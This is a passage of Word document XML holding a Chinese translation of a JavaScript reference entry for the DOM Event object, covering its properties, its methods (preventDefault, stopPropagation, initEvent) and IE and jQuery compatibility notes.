        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly integer offsetX,offs</w:t>
      </w:r>
      <w:r>
        <w:t>etY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件，这两个属性定义事件发生在事件源元素（参见</w:t>
      </w:r>
      <w:r>
        <w:t>srcElement</w:t>
      </w:r>
      <w:r>
        <w:t>）的坐标系统中的坐标。标准事件没有等效的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly integer pageX,pageY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这两个属性不是标准属性，但广泛支持，类似于</w:t>
      </w:r>
      <w:r>
        <w:t>clientX</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>clientY</w:t>
      </w:r>
      <w:r>
        <w:t>，然而它们使用文档坐标而不是窗口坐标。</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件没有定义这两个属性，不过</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>为所有浏览器模拟了它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly EventTarget relatedTarget*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>指向一个事件目标（通常是一个文档元素），该目标与事件的</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>节点</w:t>
      </w:r>
      <w:r>
        <w:t>关联。对</w:t>
      </w:r>
      <w:r>
        <w:t>mouseover</w:t>
      </w:r>
      <w:r>
        <w:t>事件来说，它是鼠标指针移动到目标上时离开的那个元素。对</w:t>
      </w:r>
      <w:r>
        <w:t>mouseout</w:t>
      </w:r>
      <w:r>
        <w:t>事件来说，它是鼠标离开目标时进入的元素。这个属性在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件中没有定义，不过</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件中模拟了它。参见</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>fromElement</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>toElement</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean returnValue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件，将这个属性设置为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>将阻止发生事件的源元素的默认动作。标准事件中使用</w:t>
      </w:r>
      <w:r>
        <w:t>preventDefault()</w:t>
      </w:r>
      <w:r>
        <w:t>方法代替。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long screenX,screenY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于鼠标事件，这两个</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义了鼠标指针相对于用户的显示器的左上角的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标。这两个属性一般不是很有用，不过适用于所有鼠标事件类型，同时标准事件和</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件都支持。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean shiftKey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>事件发生时</w:t>
      </w:r>
      <w:r>
        <w:t>Shift</w:t>
      </w:r>
      <w:r>
        <w:t>键是否按下。适用于鼠标和按键事件，也适用于</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly EventTarget srcElement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>适用于</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件，这个属性定义触发事件的对象。标准事件中使用</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>代替。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly EventTarget target*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前事件的目标对象</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>触发这个事件的对象。</w:t>
      </w:r>
      <w:r>
        <w:t>（所有可以作为事件目标的对象都实现</w:t>
      </w:r>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
      <w:r>
        <w:t>的方法。）这个属性不适用于</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件，不过</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件模拟它。参见</w:t>
      </w:r>
      <w:r>
        <w:t>srcElement</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned long timeStamp*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个数字，可能为事件发生的时间或日期的时间戳，也可能是一个至少可用来比较两个事件发生的先后顺序的数字。许多浏览器返回的是一个可传入</w:t>
      </w:r>
      <w:r>
        <w:t>Date()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数的时间戳。但是，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Firefox </w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>及更早的版本中，这个属性是另外类型的时间戳，比如自电脑启动以来的毫秒数。</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件不支持这个属性，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>将这个属性设置为</w:t>
      </w:r>
      <w:r>
        <w:t>Date.getTime()</w:t>
      </w:r>
      <w:r>
        <w:t>返回的格式的时间戳。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Element toElement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>mouseover</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>mouseout</w:t>
      </w:r>
      <w:r>
        <w:t>事件，</w:t>
      </w:r>
      <w:r>
        <w:t>toElement</w:t>
      </w:r>
      <w:r>
        <w:t>指代鼠标指针正要移入的对象。标准事件中使用</w:t>
      </w:r>
      <w:r>
        <w:t>relatedTarget</w:t>
      </w:r>
      <w:r>
        <w:t>代替。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string type*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象的事件名。这是事件处理程序注册的名字或者事件处理程序属性去掉开头的</w:t>
      </w:r>
      <w:r>
        <w:t>"on"</w:t>
      </w:r>
      <w:r>
        <w:t>之后的名字，比</w:t>
      </w:r>
      <w:r>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:t>"click"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"load"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"submit"</w:t>
      </w:r>
      <w:r>
        <w:t>。这个属性适用于标准事件和</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Window view</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>生成事件的窗口（由于历史原因叫做</w:t>
      </w:r>
      <w:r>
        <w:t>"view"</w:t>
      </w:r>
      <w:r>
        <w:t>）。这个属性适用于所有标准的用户界面事件，比如鼠标和键盘事件。</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件不支持此属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly integer wheelDelta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于鼠标滚轮（</w:t>
      </w:r>
      <w:r>
        <w:t>mousewheel</w:t>
      </w:r>
      <w:r>
        <w:t>）事件，这个属性指明</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>轴上已经滚动的数量。不同的浏览器中此属性的值也不同：细节请参见</w:t>
      </w:r>
      <w:r>
        <w:t>17.6</w:t>
      </w:r>
      <w:r>
        <w:t>节。这是一个非标准属性，但是所有浏览器都支持，包括</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及更早版本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly integer wheelDeltaX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly integer wheelDeltaY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于支持两个维度的鼠标滚轮的浏览器中的</w:t>
      </w:r>
      <w:r>
        <w:t>mousewheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件，这两个属性指明</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>方向的滚动数量。</w:t>
      </w:r>
      <w:r>
        <w:t>17.6</w:t>
      </w:r>
      <w:r>
        <w:t>节有关于如何解释这两</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>个属性的说明。如果</w:t>
      </w:r>
      <w:r>
        <w:t>wheelDeltaY</w:t>
      </w:r>
      <w:r>
        <w:t>有定义，那么它将与</w:t>
      </w:r>
      <w:r>
        <w:t>wheelDelta</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值相同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly integer which</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这是个非标准的遗留属性，除</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>外的浏览器都支持，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>中有对应的模拟。对鼠标事件来说，它和</w:t>
      </w:r>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>属性一样：</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>表示左</w:t>
      </w:r>
      <w:r>
        <w:t>键，</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>表示中键，</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>表示右键。对键盘事件来说，它和</w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r>
        <w:t>的值一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些事件都是由</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>类自己定义的，所以在所有标准</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象上它们都可用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void initEvent(string type,boolean bubbles,boolean cancelable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法初始化一个</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>bubbles</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>cancelable</w:t>
      </w:r>
      <w:r>
        <w:t>属性。向</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>createEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>方法传入字符串参数</w:t>
      </w:r>
      <w:r>
        <w:t>"Event"</w:t>
      </w:r>
      <w:r>
        <w:t>将创建一个新的事件对象。然后，在使用这个方法将其初始化之后</w:t>
      </w:r>
      <w:r>
        <w:t>，通过将它传入某个</w:t>
      </w:r>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>dispatchEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将它分发出去。其他标准事件属性（除</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>bubbles</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>cancelable</w:t>
      </w:r>
      <w:r>
        <w:t>）将在分发时初始化。如果想创建、初始化然后分发一个更复杂的合成</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>synthetic</w:t>
      </w:r>
      <w:r>
        <w:t>）事件，必须向</w:t>
      </w:r>
      <w:r>
        <w:t>createEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>传入一个不同的参数（比如</w:t>
      </w:r>
      <w:r>
        <w:t>"MouseEvent"</w:t>
      </w:r>
      <w:r>
        <w:t>），然后用类似</w:t>
      </w:r>
      <w:r>
        <w:t>initMouseEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>（本书没有介绍）的指定类型的初始化函数来初始化它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void preventDefault()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>告诉</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器不要执行与当前事件关联的默</w:t>
      </w:r>
      <w:r>
        <w:t>认操作，如果存在对应的默认操作的话。如果事件不是可取消的类型，这个方法将没有任何效果。这个方法不适用于</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件对象，不过</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>中有对应的模拟。在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件模型中，替代的方法是将</w:t>
      </w:r>
      <w:r>
        <w:t>returnValue</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void stopImmediatePropagation()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似于</w:t>
      </w:r>
      <w:r>
        <w:t>stopPropagation()</w:t>
      </w:r>
      <w:r>
        <w:t>，但除此之外，它还将阻止注册在这个文档元素上的所有其他事件处理程序。这个方法是新添加到标准事件模型中的，可能不是所有浏览器都实现它。它不适用于</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件模型，不过</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>中有对应的</w:t>
      </w:r>
      <w:r>
        <w:t>模拟。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void stopPropagation()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>阻止事件在捕获、目标、冒泡阶段进行传播。调用这个方法后，同一个节点上同一个事件的其他事件处理程序将被调用，但这个事件将不会分发到其他节点上。这个方法在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件模型中不支持，不</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>过</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>中有对应模拟。在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中，代替调用</w:t>
      </w:r>
      <w:r>
        <w:t>stopPropagation()</w:t>
      </w:r>
      <w:r>
        <w:t>的方法是将</w:t>
      </w:r>
      <w:r>
        <w:t>cancelBubble</w:t>
      </w:r>
      <w:r>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>提议属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这儿列出的属性是当前</w:t>
      </w:r>
      <w:r>
        <w:t>DOM Level 3 Events specification</w:t>
      </w:r>
      <w:r>
        <w:t>的草案中的提议。它们涉及现在浏览器中的主要不兼容部分，不过</w:t>
      </w:r>
      <w:r>
        <w:t>（在写本书时）还没有任何浏览器实现它。如果它们通用地实现了，编写处理文本输入事件、按键事件以及鼠标事件的可移植代码将更容易更简短。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned short buttons</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性类似于上面介绍过的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>版本的</w:t>
      </w:r>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string char</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于键盘事件，这个属性保存事件生成的字符串（可能包含多个字符）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于</w:t>
      </w:r>
      <w:r>
        <w:t>textinput</w:t>
      </w:r>
      <w:r>
        <w:t>事件，这个属性定义输入的文本。</w:t>
      </w:r>
    </w:p>
